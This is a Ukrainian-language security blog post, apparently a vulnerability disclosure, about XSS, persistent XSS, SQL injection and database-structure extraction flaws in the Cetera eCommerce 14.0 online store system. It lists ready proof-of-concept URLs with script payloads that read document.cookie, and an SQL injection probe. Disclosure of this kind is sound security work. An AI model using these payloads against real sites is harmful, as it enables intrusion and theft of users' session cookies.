Websecurity - Веб безпека

05.06.2010

У жовтні, 31.10.2009, я знайшов Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru.

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.07.2010

XSS:

http://site/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

На сторінці http://site/cms/templates/banner.php?bannerId=1
<script>alert(document.cookie)</script>В полях: Title, Текст.

SQL Injection:

http://site/cms/templates/banner.php?bannerId=1%20and%20version()=5

SQL DB Structure Extraction:

http://site/cms/templates/bannerlist.php?page=-1

Уразливі Cetera eCommerce 14.0 та попередні версії. Розробники в себе на сайт досі так і не виправили уразливості (окрім першої XSS).

This entry was posted on 15:18 28.07.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.